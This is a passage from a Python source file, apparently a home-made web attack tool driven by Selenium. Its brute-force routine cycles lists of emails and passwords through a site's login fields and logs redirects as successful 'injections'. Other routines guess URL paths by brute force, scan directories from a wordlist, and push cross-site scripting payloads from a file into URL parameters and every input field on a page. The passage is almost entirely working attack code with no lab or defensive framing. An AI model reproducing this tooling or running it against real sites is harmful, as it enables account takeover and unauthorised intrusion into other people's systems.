str(lenemail) + Fore.RESET} ⟫") 140 | 141 | print("⟪ ⟫") 142 | print("⟪ Injection Queue: ⟫") 143 | print("⟪ ⟫") 144 | for email in email_credentials: 145 | for password in password_credentials: 146 | try: 147 | # Send keys to the email elements 148 | 149 | for element in email_elements: 150 | element.clear() 151 | element.send_keys(email) 152 | 153 | print(create_box_line(f" {num}. {email}", box_width, "left")) 154 | num += 1 155 | 156 | 157 | # Send keys to the password elements 158 | for element in password_elements: 159 | element.clear() 160 | element.send_keys(password) 161 | 162 | 163 | # Press Enter after filling out the forms 164 | password_elements[0].send_keys(Keys.RETURN) 165 | 166 | except Exception as e: 167 | pass 168 | except KeyboardInterrupt: 169 | print("⟪ ⟫") 170 | print("⟪ Stopping... ⟫") 171 | print("⟪ ⟫") 172 | print(create_box_line(f"Last Injection: {Fore.RED + email_credentials[num - 1] + Fore.RESET}", 59, "left")) 173 | print("⟪ ⟫") 174 | print("⟪±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±⟫") 175 | exit(1) 176 | 177 | 178 | # Wait for the page to potentially redirect 179 | # Check if the URL has changed (indicating a redirect) 180 | current_url = driver.current_url 181 | 182 | if current_url != url: 183 | print("⟪ ⟫") 184 | print("⟪===============================================⟫ ") 185 | print("⟪ ⟫") 186 | print(create_box_line(f"Working Injection: {Fore.YELLOW + email_credentials[num - 1] + Fore.RESET}", 59, "left")) 187 | print(f"⟪ ⟫") 188 | print(f"⟪ Redirection: ⟫") 189 | print("⟪ ⟫") 190 | print(f"⟪ {current_url} ⟫") 191 | if current_url != "": 192 | print("⟪ ⟫") 193 | print(create_box_line(f"Injection: {Fore.GREEN + 'Successful' + Fore.RESET}", 59, "left")) 194 | save_to_json(url, num) 195 | print("⟪ ⟫") 196 | else: 197 | print(create_box_line(f"Injection: {Fore.RED + 'Failure :(' + Fore.RESET}", 49, "left")) 198 | # Keep the browser open for 10 seconds before closing 199 | time.sleep(10) 200 | 201 | 202 | def brute(url,driver,response): 203 | print("⟪===============================================⟫") 204 | print("⟪ ⟫") 205 | print("⟪ Bruting: ⟫") 206 | print("⟪ ⟫") 207 | i = 0 208 | while i <= 32: 209 | rq = requests.get(url + generate_random_string(4)) 210 | print(f"⟪ {i}. {url + generate_random_string(4)}: {rq.status_code} ⟫") 211 | i += 1 212 | 213 | def subdomain(url, driver, wordlist): 214 | 215 | driver.get(url) 216 | homecode = driver.page_source.strip() # Strip whitespace from homepage code 217 | 218 | print("Home Page Source Captured.") 219 | 220 | with open(wordlist, 'r') as f: 221 | lines = f.readlines() 222 | 223 | for line in lines: 224 | line = line.strip() # Strip whitespace from each line 225 | if not line: # Skip empty lines 226 | continue 227 | 228 | newurl = url + "/" + line 229 | 230 | try: 231 | driver.get(newurl) 232 | domaincode = driver.page_source.strip() # Strip whitespace from domain code 233 | print("⟪ ⟫") 234 | if homecode == domaincode: 235 | pass 236 | else: 237 | print(create_box_line(f"{newurl}", 49, "left")) 238 | 239 | except Exception as e: 240 | print(f"Error accessing {newurl}: {e}") 241 | 242 | # Function to handle alerts and continue 243 | def handle_alert(driver): 244 | try: 245 | # Switch to the alert and accept it 246 | alert = driver.switch_to.alert 247 | print("⟪ ⟫") 248 | print("⟪===============================================⟫") 249 | print("⟪ ⟫") 250 | print(f"⟪ Alert detected: {alert.text} ⟫") 251 | print("⟪ ⟫") 252 | alert.accept() 253 | except NoAlertPresentException: 254 | # No alert to handle 255 | pass 256 | 257 | def xssScan(driver, url,mode=1): 258 | 259 | if mode == 1: 260 | input_elements = [] 261 | print("⟪===============================================⟫") 262 | print("⟪ ⟫") 263 | print("⟪ Scanning For XSS In URL: ⟫") 264 | print("⟪ ⟫") 265 | 266 | with open('dict/xss-common.txt', 'r') as f: 267 | xss_payloads = f.readlines() 268 | 269 | param_name = "q" 270 | for payload in xss_payloads: 271 | # Construct the vulnerable URL by injecting payload into the parameter 272 | vulnerable_url = f"{url}{param_name}={payload}" 273 | 274 | 275 | # Open the URL in the browser 276 | print(create_box_line(f"{param_name}={payload.strip('\n')}", 49, "left")) 277 | try: 278 | driver.get(vulnerable_url) 279 | time.sleep(2) # Wait for the page to load 280 | 281 | # Handle any unexpected alerts 282 | handle_alert(driver) 283 | 284 | # Check if the payload is reflected in the page source 285 | page_source = driver.page_source 286 | if payload in page_source: 287 | print(00) 288 | else: 289 | pass 290 | 291 | except UnexpectedAlertPresentException: 292 | # Handle the alert if it interrupts the execution 293 | handle_alert(driver) 294 | 295 | if mode == 2: 296 | 297 | driver.get(url) 298 | time.sleep(2) # Wait for page to load 299 | with open('dict/xss-common.txt', 'r') as f: 300 | xss_payloads = f.readlines() 301 | 302 | # Find all input fields on the page 303 | inputs = driver.find_elements(By.TAG_NAME, 'input') 304 | inputCount = len(inputs) 305 | workingCount = [] 306 | 307 | print("⟪ ⟫") 308 | print("⟪===============================================⟫") 309 | print("⟪ ⟫") 310 | print(f"⟪ Input Fields: {inputCount} ⟫") 311 | print("⟪ ⟫") 312 | # color based on payload count 313 | if len(xss_payloads) <= 8: 314 | print(f"⟪ Payloads Loaded: {Fore.RED + str(len(xss_payloads)) + Fore.RESET} ⟫") 315 | if len(xss_payloads) >= 8 and len(xss_payloads) <= 16: 316 | print(f"⟪ Payloads Loaded: {Fore.YELLOW + str(len(xss_payloads)) + Fore.RESET} ⟫") 317 | if len(xss_payloads) >= 17: 318 | print(f"⟪ Payloads Loaded: {Fore.GREEN + str(len(xss_payloads)) + Fore.RESET} ⟫") 319 | 320 | print("⟪ ⟫") 321 | print("⟪===============================================⟫") 322 | print("⟪ ⟫") 323 | print("⟪ Payload Queue: ⟫") 324 | print("⟪ ⟫") 325 | 326 | # Inject payloads into all input fields 327 | for payload in xss_payloads: 328 | for input_field in inputs: 329 | try: 330 | input_field.clear() # Clear the field 331 | input_field.send_keys(payload) # Inject XSS payload 332 | input_field.send_keys(Keys.RETURN) # Submit the form or move to the next 333 | 334 | time.sleep(2) # Allow page to reload if necessary 335 | 336 | # Check if the payload appears in the HTML 337 | page_source = driver.page_source 338 | if payload in page_source: 339 | # True 340 | print(create_box_line(f" {payload.strip('\n')}", 49, "left")) 341 | workingCount.extend(payload) 342 | 343 | else: 344 | # False 345 | print(create_box_line(f" {payload.strip('\n')}", 49, "left")) 346 | 347 | except Exception as e: 348 | # Check if an alert is present 349 | try: 350 | alert = driver.switch_to.alert 351 | print("⟪ ⟫") 352 | print(create_box_line(f" {payload.strip('\n')}", 49, "left")) 353 | alert.accept() # Dismiss the alert 354 | 355 | except: 356 | print("⟪ ⟫") 357 | print("⟪===============================================⟫") 358 | print("⟪ ⟫") 359 | print(f"⟪ {Fore.RED + 'Error!' + Fore.RESET} Can't Interact With Element! ⟫") 360 | return 1 361 | 362 | print(f"Working Payloads: {len(workingCount)}") --------------------------------------------------------------------------------